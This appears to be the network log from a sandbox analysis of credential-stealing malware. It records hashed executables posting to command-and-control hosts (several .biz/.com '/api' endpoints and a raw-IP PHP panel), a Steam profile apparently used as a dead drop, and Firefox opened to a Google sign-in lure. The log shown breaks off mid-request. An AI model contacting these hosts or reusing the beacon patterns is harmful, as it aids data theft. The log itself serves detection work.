alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=68159&min_rtt=64542&rtt_var=19210&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3300&recv_bytes=605&delivery_rate=54274&cwnd=253&unsent_bytes=0&cid=375a3a97184af602&ts=1800&x=0"
POST

https://dare-curbys.biz/api

f56e441c8f.exe

Remote address:

104.21.43.156:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: dare-curbys.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:17:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ar7e40jal4ap4hfe6vjk0r25gt; expires=Mon, 31-Mar-2025 20:03:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FklT6kX6IpbuqkYfGf%2FnNor5JTbrz2leA7HEV6LB2GY2KVv5Qt71kbv4YqS%2Ff6%2BjtdMAda5Y2ibxCxBsPFr0Y1npjd6IbpEcBDnAcdi0TqhT22mhA5j%2BUpb51gOa9eI5%2Bkc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c7670ee76361-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=51045&min_rtt=50510&rtt_var=11453&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3296&recv_bytes=603&delivery_rate=74998&cwnd=253&unsent_bytes=0&cid=b6c8bcae83ff5ec5&ts=854&x=0"
DNS

92.12.20.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

92.12.20.2.in-addr.arpa

IN PTR

Response

92.12.20.2.in-addr.arpa

IN PTR

a2-20-12-92deploystaticakamaitechnologiescom
POST

https://print-vexer.biz/api

f56e441c8f.exe

Remote address:

104.21.35.246:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: print-vexer.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:17:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=j355d7q304vtrh9veaf59ee7fr; expires=Mon, 31-Mar-2025 20:03:59 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jtt3Cr0acSlYgfThSTFl63ngtkPeELzrmoa%2BkUR6aKxuN9MY1bWHAXD0v8dAX6A8n%2BwXFKf%2Fu3ZrACpPZmiIWwXArZkJmWjtnF9IgZpAyw0fg4uvZlApk%2B%2FuDQSsqkfi6r8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c76d093b955f-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=52171&min_rtt=47196&rtt_var=12766&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3294&recv_bytes=603&delivery_rate=78446&cwnd=253&unsent_bytes=0&cid=50ab8f25e199cd1c&ts=1582&x=0"
DNS

impend-differ.biz

f56e441c8f.exe

Remote address:

8.8.8.8:53

Request

impend-differ.biz

IN A

Response
DNS

steamcommunity.com

f56e441c8f.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.214.143.155
GET

https://steamcommunity.com/profiles/76561199724331900

f56e441c8f.exe

Remote address:

23.214.143.155:443

Request

GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Fri, 06 Dec 2024 02:17:22 GMT
Content-Length: 35602
Connection: keep-alive
Set-Cookie: sessionid=1632c0fd992062af2d745b50; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
POST

https://marshal-zhukov.com/api

f56e441c8f.exe

Remote address:

172.67.160.80:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: marshal-zhukov.com

Response

HTTP/1.1 403 Forbidden

Date: Fri, 06 Dec 2024 02:17:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jp58DKphGwTlndHSB7cRZcv%2FSkExNX%2F0Ubfj%2BS%2FRp5bzYFLs1jfle9ZSbvtGHuo0RNGTzxyhb7Y2MT%2BVG1UA9qypqrlIu5wIioyZJBQ9991in6bUOhKfEcwj1sGStN13yO0nWTA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c77e897f9496-LHR
POST

https://marshal-zhukov.com/api

f56e441c8f.exe

Remote address:

172.67.160.80:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=NCOHsuG9ZNw7kyq4oaqwrQOexARIbuBIgpIY7VJNt7c-1733451442-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: marshal-zhukov.com

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:17:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=onu03svvi6its1gf3jlisbojho; expires=Mon, 31-Mar-2025 20:04:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=st%2BJXnU4a7MnXZViJkklObRMJQAt6SXxSalZi1PIaxs07S45guE4xd43I4kdySOevuBM%2FUeq7vpBjG1XV4BOZurcwxNXW1kMNUrTuZKCeOsLkPdeNBZmHcQlWdrX5MIKsiYIa1Y%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c77f19fa9496-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47515&min_rtt=46913&rtt_var=4900&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8580&recv_bytes=1075&delivery_rate=172069&cwnd=257&unsent_bytes=0&cid=1bcfd0c19b0ba261&ts=1911&x=0"
GET

http://185.215.113.206/

1dd8bdd825.exe

Remote address:

185.215.113.206:80

Request

GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:17:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/c4becf79229cb002.php

1dd8bdd825.exe

Remote address:

185.215.113.206:80

Request

POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDBGHIDGDGHCBGDGCBFI
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:17:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

216.58.213.14
DNS

spocs.getpocket.com

firefox.exe

Remote address:

8.8.8.8:53

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

spocs.getpocket.com

firefox.exe

Remote address:

8.8.8.8:53

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

firefox-api-proxy.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy.cdn.mozilla.net

IN A

Response

firefox-api-proxy.cdn.mozilla.net

IN CNAME

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
GET

https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

firefox.exe

Remote address:

216.58.213.14:443

Request

GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
host: youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

216.58.213.14
GET

https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30

firefox.exe

Remote address:

34.149.97.1:443

Request

GET /desktop/v1/recommendations?locale=en-US&region=GB&count=30 HTTP/2.0
host: firefox-api-proxy.cdn.mozilla.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
consumer_key: 94110-6d5ff7a89d72c869766af0e0
if-none-match: W/"48ad-Wzzv6brE9/8oXtHM28V6BRKWozE"
te: trailers
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN AAAA

Response

youtube.com

IN AAAA

2a00:1450:4009:816::200e
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN AAAA

Response

youtube.com

IN AAAA

2a00:1450:4009:816::200e
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN A

Response

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN A

Response

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

2600:1901:0:74e4::
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN A

Response

shavar.prod.mozaws.net

IN A

52.32.237.164

shavar.prod.mozaws.net

IN A

44.226.106.83

shavar.prod.mozaws.net

IN A

52.33.23.190
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA

Response
DNS

www.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

172.217.169.78

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.178.14
DNS

www.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

172.217.169.78

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

216.58.201.110
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
GET

https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd

firefox.exe

Remote address:

142.250.187.206:443

Request

GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
host: www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
GET

https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

firefox.exe

Remote address:

142.250.187.206:443

Request

GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
host: consent.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: SOCS=CAAaBgiA_ci6Bg
cookie: YSC=oSwVSZ4ICCI
cookie: __Secure-YEC=CgtJa3lEMUFKQ3FKOCjHvcm6BjIKCgJHQhIEGgAgRg%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgRg%3D%3D
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN A

Response

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

172.217.169.78

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

216.58.201.110
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN A

Response

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

172.217.169.78

youtube-ui.l.google.com

IN A

172.217.169.46
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN AAAA

Response

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:815::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:823::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:821::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:822::200e
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN AAAA

Response

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:821::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:823::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:822::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:815::200e
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.200.14
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.200.14
DNS

14.213.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.213.58.216.in-addr.arpa

IN PTR

Response

14.213.58.216.in-addr.arpa

IN PTR

lhr25s25-in-f141e100net

14.213.58.216.in-addr.arpa

IN PTR

ber01s14-in-f14�H
DNS

firefox-settings-attachments.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-settings-attachments.cdn.mozilla.net

IN A

Response

firefox-settings-attachments.cdn.mozilla.net

IN CNAME

attachments.prod.remote-settings.prod.webservices.mozgcp.net

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

164.237.32.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

164.237.32.52.in-addr.arpa

IN PTR

Response

164.237.32.52.in-addr.arpa

IN PTR

ec2-52-32-237-164 us-west-2compute amazonawscom
DNS

206.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.187.250.142.in-addr.arpa

IN PTR

Response

206.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f141e100net
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.200.14
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN AAAA

Response

consent.youtube.com

IN AAAA

2a00:1450:4009:822::200e
GET

https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl

firefox.exe

Remote address:

34.117.121.53:443

Request

GET /main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl HTTP/2.0
host: firefox-settings-attachments.cdn.mozilla.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
te: trailers
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

14.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.200.250.142.in-addr.arpa

IN PTR

Response

14.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f141e100net
DNS

14.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.200.250.142.in-addr.arpa

IN PTR

Response

14.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f141e100net
DNS

227.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.187.250.142.in-addr.arpa

IN PTR

Response

227.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f31e100net
DNS

227.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.187.250.142.in-addr.arpa

IN PTR

Response

227.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f31e100net
DNS

74.204.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.204.58.216.in-addr.arpa

IN PTR

Response

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f741e100net

74.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f10�H

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f10�H
DNS

74.204.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.204.58.216.in-addr.arpa

IN PTR

Response

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f741e100net

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f10�H

74.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f10�H
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
GET

https://www.google.com/favicon.ico

firefox.exe

Remote address:

142.250.187.196:443

Request

GET /favicon.ico HTTP/2.0
host: www.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://consent.youtube.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN AAAA

Response

www.google.com

IN AAAA

2a00:1450:4009:81f::2004
DNS

195.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.187.250.142.in-addr.arpa

IN PTR

Response

195.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f31e100net
DNS

195.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.187.250.142.in-addr.arpa

IN PTR

Response

195.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f31e100net
DNS

196.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.187.250.142.in-addr.arpa

IN PTR

Response

196.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f41e100net
DNS

196.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.187.250.142.in-addr.arpa

IN PTR

Response

196.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f41e100net
DNS

211.38.74.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.38.74.45.in-addr.arpa

IN PTR

Response
GET

http://92.63.197.221/add?substr=mixtwo&s=three&sub=

4fe69191d8.exe

Remote address:

92.63.197.221:80

Request

